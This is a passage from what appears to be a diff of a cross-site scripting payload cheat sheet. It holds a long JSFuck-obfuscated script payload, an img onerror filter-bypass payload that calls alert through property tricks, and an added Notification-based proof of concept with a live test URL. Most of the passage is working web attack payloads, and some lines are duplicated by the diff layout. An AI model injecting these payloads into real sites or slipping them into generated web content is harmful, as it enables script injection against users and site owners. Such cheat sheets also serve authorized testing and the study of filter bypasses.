+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
``` ```
Exotic payloads Exotic payloads
``` ```
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)> <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
@ -638,6 +655,18 @@ Exotic payloads
``` ```
## More fun ?
This section will be used for the "fun/interesting/useless" stuff.
Use notification box instead of an alert - by [@brutelogic](https://twitter.com/brutelogic)
Note : it requires user permission
```
Notification.requestPermission(x=>{new(Notification)(1)})
Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//
```
## Thanks to ## Thanks to
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
* tbm * tbm